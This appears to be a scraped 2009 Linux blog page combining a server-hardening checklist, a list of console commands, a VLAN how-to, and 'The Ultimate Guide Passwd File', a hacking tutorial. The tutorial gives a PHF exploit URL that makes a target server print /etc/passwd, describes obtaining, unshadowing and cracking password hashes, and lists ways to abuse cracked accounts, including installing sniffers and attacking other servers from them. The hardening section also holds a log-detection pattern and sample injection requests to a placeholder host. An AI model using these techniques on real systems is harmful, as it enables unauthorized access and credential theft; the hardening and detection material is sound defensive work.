How to Secure a Linux Server.

May 25, 2009

1. Recompile the kernel with the grsecurity/PaX patch set

2. Firewall: CSF (ConfigServer Security & Firewall)

3. Stop unnecessary processes

4. Install Logcheck

5. Install Logwatch

   Optimizing host.conf and sysctl.conf
   http://www.eth0.us/node/104

To modify Logwatch, SSH into the server and log in as root. At the command prompt type: pico -w /etc/log.d/conf/logwatch.conf

Scroll down to

MailTo = root

and change it to

MailTo = your@email.com

Note: Set the e-mail address to an offsite account in case the server gets compromised; a report that only stays on the box can be edited or deleted by the intruder.

Now scroll down to

Detail = Low

Change that to Medium or High, i.e.

Detail = 5 or Detail = 10

Note: High will give you more detailed reports including all actions. Save and exit. (On newer Logwatch packages the file lives at /etc/logwatch/conf/logwatch.conf instead.)

6. If cpanel server then WHM configuration check

7. OpenSSH configuration check

8. Switch from proftpd to pure-ftpd

9. Rootkit Hunter

rkhunter:


1. Log in to your server via SSH as root. Then type: cd /usr/local/src/

2. Download RKHunter version 1.1.4 (the release current when this was written; use the latest release from the rkhunter project and verify its checksum before installing)

Type: wget http://downloads.rootkit.nl/rkhunter-1.1.4.tar.gz

3. Extract the files

Type: tar -xzvf rkhunter-1.1.4.tar.gz

4. Type: cd rkhunter

5. Type: ./installer.sh

6. Let's set up RKHunter to e-mail you daily scan reports.

Type: pico -w /etc/cron.daily/rkhunter.sh

Add the following:

#!/bin/bash
# Run the rkhunter checks non-interactively and mail the report.
/usr/local/bin/rkhunter -c --cronjob 2>&1 | mail -s "RKhunter Scan Details" replace-this@with-your-email.com

Replace the e-mail address above with your own!

It is best to send the e-mail to an off-site mailbox so that, if the box IS compromised, the attacker cannot erase the scan report without also compromising another server.

Type: chmod +x /etc/cron.daily/rkhunter.sh

10. Chkrootkit

Installing chkrootkit

   [root@server ~]# wget ftp://ftp.pangeia.com.br/pub/seg/pac/chkrootkit.tar.gz
   [root@server ~]# tar xvfz chkrootkit.tar.gz
   [root@server ~]# cd chkrootkit-*
   [root@server chkrootkit]# make sense        # builds the helper binaries (chkproc, chkdirs, ...) the script calls
   [root@server chkrootkit]# ./chkrootkit

Note: chkrootkit relies on the system's own ps, ls, netstat and friends. If you suspect a compromise, run it against known-good binaries (e.g. from a mounted rescue CD) with the -p option, since a rootkit that has replaced those tools will also hide from a check that uses them.

11. mod_security

12. mod_evasive

13. Host spoof protection

14. Operating System check

15. Name server configuration check

16. Disk check

17. Kernel check

18. Apache tune and check

19. MySQL tune and check

20. Enhanced log rotation

21. Day of the week backup rotations

22. Secure /tmp, /var/tmp and /dev/shm (separate filesystems or a loopback file mounted noexec,nosuid,nodev)

23. Libsafe for 2.4 kernels

24. Exploit check

25. Delete unnecessary OS users

26. Disable open DNS recursion

27. Enhanced path protection

28. Remove the SUID/SGID bit from binaries that do not need it (find / -xdev -type f \( -perm -4000 -o -perm -2000 \) -ls lists them)

29. PHP hardening

30. phpsuexec

31. Disable vulnerable phpBB installs

32. Initial cPanel configuration

33. Check iptables is configured

34. Check incoming MySQL port

35. Check /etc/cron.daily/logrotate

36. Check /etc/resolv.conf for localhost entry

37. Check /etc/named.conf for recursion restrictions

38. Check server runlevel

39. Check nobody cron

40. Check Operating System support

41. Check SSHv1 is disabled

42. Check SSH on non-standard port

43. Check SSH PasswordAuthentication

44. Check telnet port 23 is not in use

45. Check shell limits

46. Check Background Process Killer

47. Check root forwarder

48. Check exim for extended logging

49. Check php.ini for enable_dl = Off

50. Check php.ini for disable_functions, e.g.

disable_functions = show_source, system, shell_exec, passthru, exec, phpinfo, popen, proc_open

(allow_url_fopen is an ini directive, not a function, so it does not belong in disable_functions; set allow_url_fopen = Off on its own line.)

51. Check php.ini for register_globals = Off

52. Check php open_basedir protection

53. Check phpsuexec

54. Check cPanel login is SSL only

55. Check boxtrapper is disabled

56. Check max emails per hour is set

57. Check whether users can reset passwords via email

58. Check whether native cPanel SSL is enabled

59. Check compilers

60. Check Anonymous FTP access

61. Check allow remote domains

62. Check block common domains

63. Check allow park domains

64. Check package updates

65. Check security updates

66. Check melange chat server

67. service cups stop; chkconfig cups off

68. service xfs stop; chkconfig xfs off

69. service atd stop; chkconfig atd off

70. service nfslock stop; chkconfig nfslock off

71. service canna stop; chkconfig canna off

72. service FreeWnn stop; chkconfig FreeWnn off

73. service cups-config-daemon stop; chkconfig cups-config-daemon off

74. service iiim stop; chkconfig iiim off

75. service mDNSResponder stop; chkconfig mDNSResponder off

76. service nifd stop; chkconfig nifd off

77. service rpcidmapd stop; chkconfig rpcidmapd off

78. service bluetooth stop; chkconfig bluetooth off

79. service anacron stop; chkconfig anacron off

80. service gpm stop; chkconfig gpm off

81. service saslauthd stop; chkconfig saslauthd off

82. service avahi-daemon stop; chkconfig avahi-daemon off

83. service avahi-dnsconfd stop; chkconfig avahi-dnsconfd off

84. service hidd stop; chkconfig hidd off

85. service pcscd stop; chkconfig pcscd off

86. service sbadm stop; chkconfig sbadm off

87. service webmin stop; chkconfig webmin off

88. Add a load alert script run from a 1-minute cron

   #!/bin/bash
   # Load alert script: mail when the 1-minute load average exceeds a threshold.
   # Field NF-2 of uptime's output is the 1-minute load average (with a trailing comma);
   # cut keeps the integer part so the comparison below works in shell arithmetic.
   UP=$(uptime | awk '{print $(NF-2)}' | cut -d. -f1)
   if [ "$UP" -gt 4 ]
   then
       uptime | mail -s "**SERVER LOAD is $UP" mailadd@mail.com
   fi

89. Ignore ping:

iptables -A INPUT -p icmp -j DROP

Better: drop only echo-requests, i.e. iptables -A INPUT -p icmp --icmp-type echo-request -j DROP. Dropping every ICMP type also discards "fragmentation needed" and "destination unreachable" messages, which breaks path MTU discovery and makes connections to some networks hang.

echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_all

vi /etc/sysctl.conf

Append the following line:

net.ipv4.icmp_echo_ignore_all = 1

90. Find directories with 777 permissions.

              find . -type d -perm 777

Note: -perm 777 matches only directories that are exactly 777. To catch every world-writable directory that lacks the sticky bit (the dangerous case), use: find / -xdev -type d -perm -0002 ! -perm -1000

91. Check for open ports using the nmap command from another host (nmap -sS -p- <server-ip>), so you see what the network sees, and compare with netstat -tulpn run locally.

92. Disable version identification output for Apache

To disable the version output for Apache, SSH into the server and log in as root.

At the command prompt type: pico /etc/httpd/conf/httpd.conf

Scroll (way) down and change the following lines to

ServerSignature Off
ServerTokens Prod

(ServerSignature Off removes the version footer from error pages; ServerTokens Prod reduces the Server response header to just "Apache".)

Restart Apache

At the command prompt type: /etc/rc.d/init.d/httpd restart

93. Change the ssh ListenAddress in /etc/ssh/sshd_config so the daemon binds only to the management address

94. Set PermitRootLogin no in /etc/ssh/sshd_config (restart sshd and confirm you can still log in as an unprivileged user before closing the current session)

95. Add a root login alert

vi /root/.bash_profile

   # Mail an alert every time someone obtains a root shell; $NF is the last field of
   # "who am i", i.e. the originating host in parentheses.
   echo "ALERT - Root Shell Access on: $(date) $(who)" | mail -s "Alert: Root Access from $(who am i | awk '{print $NF}')" your@email.com

96. Set an SSH legal banner: put the text in /etc/issue.net and set Banner /etc/issue.net in sshd_config; /etc/motd is only shown after a successful login.
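The SSH items above (41 SSHv1 disabled, 42 non-standard port, 43 PasswordAuthentication, 93 ListenAddress, 94 PermitRootLogin) are easy to check by hand and easy to get wrong, because sshd honours only the first occurrence of a keyword and ignores commented lines. The script below is an added example, not part of the original checklist; the two configuration texts in it are constructed for the example and the audit rules are this editor's, not sshd's own.

```shell
#!/bin/sh
# Added example, not from the original checklist: audit an sshd_config for the items above
# (41 SSHv1 off, 42 non-standard port, 43 PasswordAuthentication, 93 ListenAddress,
# 94 PermitRootLogin). Both configs below are constructed for this example.

SSHD_WEAK='# constructed sample: a stock-looking sshd_config
Protocol 2,1
Port 22
ListenAddress 0.0.0.0
PermitRootLogin yes
#PasswordAuthentication no
PasswordAuthentication yes'

SSHD_HARDENED='Protocol 2
Port 2222
ListenAddress 10.0.0.5
PermitRootLogin no
PasswordAuthentication no'

# sshd_get CONFIG_TEXT KEYWORD: effective value of KEYWORD, lower-cased. sshd honours the
# FIRST occurrence of a keyword, matches keywords case-insensitively and ignores comments,
# which is why the commented "#PasswordAuthentication no" above must not count.
sshd_get() {
  printf '%s\n' "$1" | awk -v key="$2" '
    /^[[:space:]]*#/ || /^[[:space:]]*$/ { next }
    tolower($1) == tolower(key)          { print tolower($2); exit }'
}

# audit_sshd CONFIG_TEXT: one "FAIL ..." line per weak setting, "OK" when none; the return
# value is the number of failures. Unset keywords are judged by sshd's defaults
# (PermitRootLogin and PasswordAuthentication default to yes, Port to 22, bind to all).
audit_sshd() {
  cfg=$1
  fails=0
  proto=$(sshd_get "$cfg" Protocol)
  case "${proto:-unset}" in
    *1*|unset) echo "FAIL Protocol should be set to 2 explicitly (currently ${proto:-unset})"; fails=$((fails + 1)) ;;
  esac
  port=$(sshd_get "$cfg" Port)
  [ "${port:-22}" != 22 ] || { echo "FAIL sshd listens on the default port 22"; fails=$((fails + 1)); }
  la=$(sshd_get "$cfg" ListenAddress)
  case "${la:-0.0.0.0}" in
    0.0.0.0|::|\[::\]) echo "FAIL ListenAddress binds every interface (${la:-unset})"; fails=$((fails + 1)) ;;
  esac
  prl=$(sshd_get "$cfg" PermitRootLogin)
  [ "${prl:-yes}" = no ] || { echo "FAIL PermitRootLogin is ${prl:-unset, which defaults to yes}"; fails=$((fails + 1)); }
  pa=$(sshd_get "$cfg" PasswordAuthentication)
  [ "${pa:-yes}" = no ] || { echo "FAIL PasswordAuthentication is ${pa:-unset, which defaults to yes}"; fails=$((fails + 1)); }
  [ "$fails" -ne 0 ] || echo OK
  return "$fails"
}

# On a live host: audit_sshd "$(cat /etc/ssh/sshd_config)"
```

The audit reads the file the way sshd does (first match wins, comments skipped) but ignores Match blocks, which can override any of these keywords for particular users or addresses; on the host itself, sshd -T prints the fully resolved configuration and is the authoritative thing to check.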

97. Locate (run updatedb first; the locate database is only as fresh as its last update).

   locate shell.php
   locate irc
   locate eggdrop
   locate bnc
   locate BNC
   locate ptlink
   locate BitchX
   locate guardservices
   locate psyBNC
   locate .rhosts

98. Perform some UDP and TCP scans from outside, for example here:

http://www.hackerwatch.org/probe/

This site is not bad either: https://grc.com/x/ne.dll?bh0bkyd2

99. Check /var/log/secure, /var/log/messages and the other log files of the services running to see if there are any issues.

100. Check your box to see if performance has degraded or if the machine is being over-used.

For that, use the commands

vmstat

    Displays information about memory, cpu and disk.
    Ex: bash# vmstat 1 4 (where 1 is delay and 4 is count)

mpstat

    Displays statistics about cpu utilization. This will help us to see if your cpu is over worked or not.
    Ex: bash# mpstat 1 4 (where 1 is delay and 4 is count)

iostat

    This command displays statistics about the disk system.
    Useful options:
    -d - Gives the device utilization report.
    -k - Display statistics in kilobytes per second.
    Ex: bash# iostat -dk 1 4 (where 1 is delay and 4 is count)

sar

    Displays overall system performance.

Check to see if your server has any hidden processes running.

ps

    Displays the status of all known processes. Compare the PIDs it reports with the numeric entries in /proc; a PID present in /proc but missing from the ps output is what a process-hiding rootkit produces.

lsof

    Lists all open files. In Linux everything is considered a file, so you will be able to see almost all of the activity on your system with this command.

101. Miscellaneous checks

    * chmod -R 700 /etc/rc.d/init.d/*
    * Use rpm -Va to find out whether any packaged file has been modified (the S, 5 and M columns flag changed size, digest and mode)
    * Apply security patches to vulnerable software (i.e. patch -p1 < patchfile)
    * Remove all unneeded ttys and console logins by removing the entries from /etc/securetty
    * Check system logs (e.g. /var/log/messages, /var/log/secure, etc.)
    * Set a password on the boot loader (lilo and grub both support this)
    * Monitor the system (Nagios or Big Brother)

102. Install AIDE (Advanced Intrusion Detection Environment), a free replacement for Tripwire: http://www.cs.tut.fi/~rammer/aide.html

Initialise its database right after hardening, before the server is exposed, and keep a copy of the database and the aide binary on read-only or offline media; a database the attacker can rewrite proves nothing.

103. Testing phase, before and while in production.

Use tools like Nessus, Nikto, and nmap to do a penetration test and see how well your server is secured. Also do a stress test.

Grep the Apache domain logs for URL-encoded command strings that web shells and injection attempts typically carry:

find /usr/local/apache/domlogs -exec egrep -iH '(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20' {} \;

(The short tokens sh and cd also match harmless requests such as search%20 or abcd%20; review the hits rather than acting on the count.)
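To show what that log search looks like when it is driven by a script rather than typed once, here is an added example that is not part of the original checklist. The access-log lines are constructed for the example (evil.example is a placeholder host), and the pattern is a tightened version of the one above, requiring the command token to follow a query-string or shell separator so that search%20 and abcd%20 no longer match.

```shell
#!/bin/sh
# Added example, not from the original checklist: run an injection pattern like the egrep
# above over Apache access-log lines and summarise the hits by client. The log lines are
# constructed for this example (combined log format; evil.example is a placeholder host).

SAMPLE_LOG='203.0.113.7 - - [25/May/2009:10:01:02 +0000] "GET /index.php?page=http://evil.example/x.txt?cmd=wget%20http://evil.example/bd HTTP/1.1" 200 512 "-" "Mozilla"
198.51.100.9 - - [25/May/2009:10:01:03 +0000] "GET /search.php?q=search%20terms HTTP/1.1" 200 2048 "-" "Mozilla"
203.0.113.7 - - [25/May/2009:10:01:04 +0000] "GET /cgi-bin/test.cgi?x=;cd%20/tmp;curl%20-O%20http://evil.example/sh HTTP/1.1" 404 221 "-" "Mozilla"
192.0.2.4 - - [25/May/2009:10:01:05 +0000] "GET /images/abcd%20logo.png HTTP/1.1" 200 9001 "-" "Mozilla"'

# injection_hits: stdin -> matching lines. The checklist pattern is tightened so the command
# token must follow a query-string or shell separator (= ? ; | & or their URL encodings);
# this keeps search%20 and abcd%20 out while still catching ;cd%20 and =wget%20.
injection_hits() {
  grep -Ei '([?=;|&]|%3b|%7c|%26)(wget|curl|lynx|gcc|perl|sh|cd|mkdir|touch)%20'
}

# injection_sources: stdin -> "count ip" per offending client, busiest first
injection_sources() {
  injection_hits | awk '{ hits[$1]++ } END { for (ip in hits) print hits[ip], ip }' | sort -rn
}

# hit_count: stdin -> number of matching lines
hit_count() {
  injection_hits | awk 'END { print NR }'
}

# Over the real logs: find /usr/local/apache/domlogs -type f -exec cat {} + | injection_sources
```

Feed the real domlogs through injection_sources (the last comment shows how) and the busiest source addresses come out first; a 200 status on a hit line, as in the first sample line, means the request was served and deserves a look at what the script on that path did with the parameter.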

50 Common Linux Console Commands You Should Learn By Heart

February 11, 2009
  1. clear: Clears the terminal window
  2. ls directory: List contents of a directory
  3. cat filename: Displays the contents of a file in the terminal
  4. rm filename: Removes a file
  5. cp sourcefile destinationfile: Copies a file
  6. passwd: Changes password
  7. motd: Message of the Day
  8. finger username: User information lookup program
  9. startx: Starts an X Window System server
  10. less filename or more filename: Displays the contents of a file in the terminal one page at a time
  11. info: Displays information and documentation on shells, utilities and programs
  12. lpr filename: Sends file to printer
  13. grep string filename: looks through files for strings
  14. head filename: Displays first 10 lines of file
  15. tail filename: Displays last 10 lines of file
  16. mv existingfilename newfilename: Moves or renames file
  17. file filename: Displays information about file contents
  18. echo string: Copies string to terminal
  19. date: Displays current date and time
  20. cal: Displays calendar
  21. gzip filename: Compresses a file
  22. gunzip filename: Decompresses a compressed file
  23. which command: Displays path to command
  24. whereis command: Displays paths to locations of commands
  25. who: Lists currently logged on users
  26. finger username@hostname: Obtains detailed information about a user currently using the system
  27. w: Lists currently logged on users with processing usage
  28. mesg y/n: Sets options for letting other users write you messages
  29. write user: Sends message to other users
  30. talk user: Allows two way chat to other users
  31. chmod permissions filename: Changes file access permissions
  32. mkdir directoryname: Makes a directory
  33. rmdir directoryname: Removes an empty directory
  34. ln existingfile new-link: Creates link to an existing file (hard link)
  35. df: Displays all mounted filesystems
  36. top: Displays updating list of currently running processes
  37. tty: Displays the name of the terminal in which the command was issued
  38. kill PID or %job number: Aborts a process by PID (Process Identification Number) or job number
  39. jobs: Displays a list of current jobs
  40. netstat: Displays network connections
  41. traceroute host: Prints the route packets take to the host
  42. nslookup: Queries Internet domain name servers
  43. hostname: Displays system identity name
  44. rlogin host: Utility to connect to a remote system (cleartext; superseded by ssh)
  45. telnet host: Utility to connect to a remote system (similar to rlogin but more interactive; also cleartext, use ssh instead)
  46. rcp file remotemachine: Used to copy files to or from a remote computer (cleartext; use scp or rsync over ssh)
  47. ftp: Utility to transfer files between systems on a network (credentials travel in cleartext; prefer sftp)
  48. rsh command: Utility to run a command on a remote system without logging in (cleartext and host-trust based; use ssh host command)
  49. ping host: Utility used to test connection to a remote system
  50. lcd directorypath: Changes local machine directory while logged on to remote machine

The Ultimate Guide Passwd File

February 9, 2009

 [***The Ultimate Guide Passwd Files***]

CONTENTS
1. Introduction
2. What is a Passwd File?
3. PHF Exploit
4. FTP Passwd
5. Shadowed Passwds
6. Crackers
7. Wordlists
8. Using Cracked Passwds
________________________________________________________

1. Introduction

Passwd files are the easiest and simplest way to hack. This text will explain what they are, how to get them, how to crack them, what tools you will need, and what you can do with them. Of course, the minute you sign on to the account you just happened to crack because of this file, you are breaking the law. This text is for information, not illegal activities. If you choose to do illegal activities with the information from this, it is no one's fault but your own. Now down to the good stuff [=.

________________________________________________________

2. What is a Passwd File

A passwd file is a plain-text file listing the accounts on a server; what is protected is the password field, which holds a one-way hash (traditional DES crypt(3) in the examples here) rather than the password itself. So don't start thinking that all you have to do is find one and you've hit the jackpot. Nope, sorry, there's a lot more to it than that. The passwd file should look something like this:

root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
bin:x:2:2:0000-Admin(0000):/usr/bin:
listen:x:37:4:Network Admin:/usr/net/nls:
nobody:x:60001:60001:uid nobody:/:
noaccess:x:60002:60002:uid noaccess:/:
ftp:x:101:4:FTPUser:/export/home/ftp:
rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc:/bin/ksh

Out of that entire section the only entry you could use is rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc:/bin/ksh. Here is how you read the line (seven colon-separated fields):

rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc:/bin/ksh
Username: rrc
Hashed password: uXDg04UkZgWOQ
User number (UID): 201
Group number (GID): 4
Real name (usually): Richard Clark
Home directory: /export/home/rrc
Login shell: /bin/ksh

It is usable because it is the only entry with a real password hash.
You will never find a passwd file that has a crackable hash for
system accounts like ftp, listen, bin, etc.; their field holds x or * instead. Occasionally,
using the PHF exploit or by unshadowing a passwd file, you can get the hash for root.
________________________________________________________

3. PHF Exploit

First let me explain what an exploit is. An exploit is a hole in software that allows someone to get something out of it that... well, you aren't supposed to.
The PHF exploit is a hole in the phf CGI program shipped with early NCSA and Apache servers (CVE-1999-0067): phf built a shell command from the Qalias parameter and failed to strip an encoded newline, so whatever followed it ran as a command under the web server's user. Most servers have fixed it now (if they have CGI at all). Let's just say a very popular IRC place has a problem with their CGI. Also, on the subject of servers with the exploit open, many foreign servers have this open. Unlike the FTP passwd method you don't even have to access their FTP or log in. What you do is get a web browser and then in the place for the WWW address type:

http://www.target.com/cgi-bin/phf?Qalias=j00%ffcat%20/etc/passwd

In place of www.target.com put the server whose passwd you want to get. If you get a message like "The requested object does not exist on this server. The link you followed is either outdated, inaccurate, or the server has been instructed not to let you have it." it's not there. If you get "You have been caught on Candid Camera!" they caught you (that reply comes from a decoy phf script that logs the attempt), but don't fear, they rarely ever report you. I have yet to find a server that does report. Of course, if you get something like

root:JPfsdh1NAjIUw:0:0:Special admin sign in:/:/bin/csh
sysadm:ufcNtKNYj7m9I:0:0:Regular Admin login:/admin:/sbin/sh
bin:*:2:2:Admin :/bin:
sys:*:3:3:Admin :/usr/src:
adm:*:4:4:Admin :/usr/adm:/sbin/sh
daemon:*:1:1: Daemon Login for daemons needing
nobody:*:65534:65534::/:
ftp:*:39:39:FTP guest login:/var/ftp:
dtodd:yYn1sav8tKzOI:101:100:John Todd:/home/dtodd:/sbin/sh
joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh

you have hit the jackpot [=. Save it as a text file and keep it handy, because you will need it later in the lesson.

________________________________________________________________

4. FTP Passwd

The passwd file on some systems is kept on FTP, which can pretty much be accessed by anyone, unless the FTP server disallows anonymous logins. If you are desperate to get a passwd file from a certain server (which may not even be open, so only do this if you are desperate or you want to hack your own server) get an account that allows you access to their FTP. What you do is get an FTP client such as WS_FTP or CuteFTP. Find the server's name and connect to it. You should get a list of directories like "etc, hidden, incoming, pub"; go to the one called etc. Inside etc should be a few files like "group, passwd"; if by any chance you see one called shadow there is an 8/10 chance you are about to deal with a shadowed passwd. Well, get the passwd file and maybe check out what else is on the server so it won't look so suspicious. Anyway, when you log out, run and check out your new passwd file. If you only see names like "root, daemon, FTP, nobody, ftplogin, bin" with * beside their names where the hashed passwd should be, you got a passwd file that you cannot crack. (The passwd under an anonymous FTP root is usually a cut-down copy created so the FTP daemon's ls can map UIDs to names, not the system's real /etc/passwd.) But if it happens to have user names (like rcc:*: or ggills:*:) with a * (or another symbol) you have a shadowed passwd. Of course, if you have been reading and paying attention, if you have something that has a few lines that look like:
"joetest:0IeSH6HfEEIs2:102:100::/home/joetest:/usr/bin/restsh"
you have gotten one you can crack [=.
________________________________________________________________

5. Shadowed Passwd's

Now if you happen to find a passwd file that looks something like this: "joetest:*:102:100::/home/joetest:/usr/bin/restsh"
which has a user name, not a program's, you have a shadowed passwd. The shadow file has the hashes in it. Depending on the operating system, the shadow file may be in different places. To find out what operating system your target is running, from telnet (connected to that server, of course) type uname -a and it should say; if you cannot get to telnet there are other methods of finding out. Here is a guide to each system's shadow file location (taken from a text on passwd files by Kryto). A token is the * (or other symbol) in the password field of a shadowed entry.

UNIX Paths (Courtesy of 2600)

UNIX                    Path                                                    Token
----------------------------------------------------------------------------------------------
AIX 3                   /etc/security/passwd                                    !
   or                   /tcb/auth/files/<first letter of username>/<username>   #
A/UX 3.0s               /tcb/files/auth/?/                                      *
BSD4.3-Reno             /etc/master.passwd                                      *
ConvexOS 10             /etc/shadpw                                             *
ConvexOS 11             /etc/shadow                                             *
DG/UX                   /etc/tcb/aa/user/                                       *
EP/IX                   /etc/shadow                                             x
HP-UX                   /.secure/etc/passwd                                     *
IRIX 5                  /etc/shadow                                             x
Linux 1.1               /etc/shadow                                             *
OSF/1                   /etc/passwd[.dir|.pag]                                  *
SCO Unix #.2.x          /tcb/auth/files/<first letter of username>/<username>   *
SunOS4.1+c2             /etc/security/passwd.adjunct                            ##username
SunOS 5.0               /etc/shadow                                             <optional NIS+ private secure maps/tables/whatever>
System V Release 4.0    /etc/shadow                                             x
System V Release 4.2    /etc/security/* database
Ultrix 4                /etc/auth[.dir|.pag]                                    *
UNICOS                  /etc/udb                                                *

Anyway, once you have the passwd file (with user names) and the shadow file, you can find an unshadowing program which combines the passwd file and the shadow file into what a regular passwd file would be (John the Ripper ships one, called unshadow). An unshadowing program can be found at http://www.hackersclub.com/km/downloads/password_cracker/ucfjohn2.zip. Now, some servers keep the shadow file restricted so no one without a special account on the server can get to it; on any properly configured system it is readable only by root, which is the whole point of shadowing.
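The two things this section and section 2 describe, telling a real hash apart from a shadow token or an empty field, and splicing the shadow hashes back into the passwd entries the way an unshadow program does, fit in a few lines of awk. The script below is an added example and not part of the original text; its passwd and shadow inputs are constructed from the entries quoted above (the guest account with an empty password field and the shadow lines are invented for the example).

```shell
#!/bin/sh
# Added example, not part of the original text: read passwd-format entries, tell the
# usable hashes from shadowed or locked fields, and merge a shadow file back in the way an
# "unshadow" program does. Both inputs are constructed here from the entries quoted above.

PASSWD_SAMPLE='root:x:0:1:0000-Admin(0000):/:/bin/ksh
daemon:x:1:1:0000-Admin(0000):/:
rrc:uXDg04UkZgWOQ:201:4:RichardClark:/export/home/rrc:/bin/ksh
joetest:*:102:100::/home/joetest:/usr/bin/restsh
guest::500:500:Guest account:/home/guest:/bin/sh'

SHADOW_SAMPLE='root:JPfsdh1NAjIUw:14000:0:99999:7:::
joetest:0IeSH6HfEEIs2:14000:0:99999:7:::'

# classify_passwd: reads passwd lines on stdin, prints "user<TAB>class" per entry.
#   hash-present        field 2 holds a real hash (crackable offline)
#   shadowed-or-locked  x, *, ! or !! point at the shadow file or lock the account
#   EMPTY-PASSWORD      field 2 is empty: anyone can log in without a password
classify_passwd() {
  awk -F: 'NF >= 6 {
    pw = $2
    if (pw == "x" || pw == "*" || pw == "!" || pw == "!!") cls = "shadowed-or-locked"
    else if (pw == "") cls = "EMPTY-PASSWORD"
    else cls = "hash-present"
    print $1 "\t" cls
  }'
}

# unshadow_merge PASSWD_TEXT SHADOW_TEXT: print the passwd lines with field 2 replaced by
# the hash from the shadow entry of the same user, where one exists (unshadow-style).
unshadow_merge() {
  { printf '%s\n' "$2"; echo '--END-OF-SHADOW--'; printf '%s\n' "$1"; } |
  awk -F: -v OFS=: '
    $0 == "--END-OF-SHADOW--" { in_passwd = 1; next }
    !in_passwd                { hash[$1] = $2; next }   # shadow section: user -> hash
    ($1 in hash) && hash[$1] != "" { $2 = hash[$1] }    # passwd section: splice hash in
    { print }'
}

# crackable_users PASSWD_TEXT SHADOW_TEXT: users whose merged entry carries a real hash
crackable_users() {
  unshadow_merge "$1" "$2" | classify_passwd | awk -F'\t' '$2 == "hash-present" { print $1 }'
}

# empty_password_users PASSWD_TEXT: accounts that need no password at all
empty_password_users() {
  printf '%s\n' "$1" | classify_passwd | awk -F'\t' '$2 == "EMPTY-PASSWORD" { print $1 }'
}
```

On the defending side the same classifier is the check worth running on your own machines: empty_password_users "$(cat /etc/passwd)" should print nothing, and classify_passwd on /etc/passwd should report every account as shadowed-or-locked, with the hashes living only in root-readable /etc/shadow.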
________________________________________________________________

6. Crackers

Now that you have gotten a passwd file, what the hell do you do with it to get passwords from it? That's where crackers come in.
A cracker takes the passwd file and a wordlist, hashes each word the same way the system did and compares the result to the hash in the passwd file. I have used many different crackers. Everyone has their favorite. My personal favorite is one called PaceCrack95 Ver. 1.1

http://tms.netrom.com/~cassidy/utils/pacec.zip

Many people swear that John the Ripper is the greatest but I have problems with it, but it can be gotten off any decent hacking page. Same for Cracker Jack. A cracker will load a wordlist and a passwd file and compare the two. When it cracks a password it will tell you the user name and the plaintext password. You don't need to write it down because the program auto-saves it. Cracker Jack saves the file as jack.pot and I think John the Ripper does too. PaceCrack95 Ver. 1.1 saves it under the file's name (e.g., passwd.txt.db), with the exact name, as a .DB file. I like to keep a passwd file once I have cracked it and later try out a new passwd cracker on it with the same wordlist and see if it works or if it is fake. It helps [=.
___________________________________________________________________________

7. Wordlists 

Wordlists are a necessity for cracking passwd files. They are just huge lists of words. The biggest wordlist is available from here: ftp://ftp.ox.ac.uk/pub/wordlists/
If you get a passwd file from another country, get a wordlist in the same language as the passwd file came from, as the users would probably use words they are familiar with [=. There are some programs which can generate random numbers to your specification, but that might not be really great, since there is such a huge amount of number combinations they could use. I am not completely saying they are useless since I have cracked a password with one before; I had fashioned my own list of 4-digit numbers since people might use their phone number, and well, it worked [=.
____________________________________________________________________________

8. What to do with a Cracked Passwd file

What you can do with a passwd is up to you. The nice thing to do is inform the administrator of the server that accounts on his (or her) server are insecure and possibly open to anyone hacking an account and bringing havoc upon their server. Some other things you can do is fire up good old telnet and connect to one of their ports and see what you could do with that account. The possibilities are endless. You could hack a webpage (I wouldn't do that on account of how lame it is to destroy someone's piece of work.)
You could use an exploit in sendmail and get root, or install a sniffer on the system and get all the passwords you could ever want from it. You could use the account to do work on OTHER servers that you sure as hell wouldn't want to do from your own. If your account is cancelled you can use a hacked account's dial-up till you purchase a new one. Like I said, the list goes on and on. I am sure no one wants you doing anything destructive (it's lame anyhow.) And the best thing to do is report the problem to the system admin so, if he finds out, he won't freak and call your admin and tell him you have been doing naughty things, or even call the cops. I hope this text was informative enough to fulfill your needs [=. Goat

VLAN ON LINUX

January 28, 2009

Howto: Configure Linux Virtual Local Area Network 

 

VLAN is an acronym for Virtual Local Area Network. Several VLANs can co-exist on a single physical switch; on the Linux side they are configured via software (Linux commands and configuration files) rather than through a hardware interface (you still need to configure the switch port as a trunk carrying the VLAN IDs you use).

Hubs or switches connect all nodes in a LAN, and nodes can communicate without a router. For example, all nodes in LAN A can communicate with each other without the need for a router. If a node from LAN A wants to communicate with a LAN B node, you need to use a router. Therefore, each LAN (A, B, C and so on) is separated by a router.

VLAN, as the name suggests, lets multiple LANs share one physical network while staying separate. But what are the advantages of VLAN?

  • Performance
  • Ease of management
  • Security
  • Trunks
  • You don’t have to configure any hardware device, when physically moving server computer to another location etc.

VLAN concepts and fundamental discussion is beyond the scope of this article. I am reading following textbooks. I found these textbooks extremely useful and highly recommended:

  • Cisco CNNA ICND books (part I and II)
  • Andrew S. Tanenbaum, Computer Networks book

Linux VLAN Configuration Issue

I am lucky enough to get couple of hints from our internal wiki docs :D .

  • Not all network drivers support VLAN. You may need to patch your driver.
  • MTU may be another problem. 802.1Q works by tagging each frame, i.e. an Ethernet header extension that enlarges the header from 14 to 18 bytes. The VLAN tag contains the VLAN ID and priority, so a driver that cannot receive 1522-byte frames drops tagged full-size packets. See the Linux VLAN site for patches and other information.
  • Do not use VLAN ID 1, as it is the default/native VLAN on most switches and may be used for admin purposes.

Linux VLAN How To

My VLAN ID is 5. So I need to copy the file /etc/sysconfig/network-scripts/ifcfg-eth0 to /etc/sysconfig/network-scripts/ifcfg-eth0.5

# cp /etc/sysconfig/network-scripts/ifcfg-eth0 /etc/sysconfig/network-scripts/ifcfg-eth0.5
Now, I've one network card (eth0) and it needs to use tagged network traffic for VLAN ID 5.

  • eth0 - Your regular network interface (untagged frames)
  • eth0.5 - Your virtual interface that sends and receives frames tagged with VLAN ID 5

Do not modify the /etc/sysconfig/network-scripts/ifcfg-eth0 file. Now open the file /etc/sysconfig/network-scripts/ifcfg-eth0.5 using the vi text editor:
# vi /etc/sysconfig/network-scripts/ifcfg-eth0.5
Find the DEVICE=eth0 line and replace it with:
DEVICE=eth0.5
Append the line:
VLAN=yes
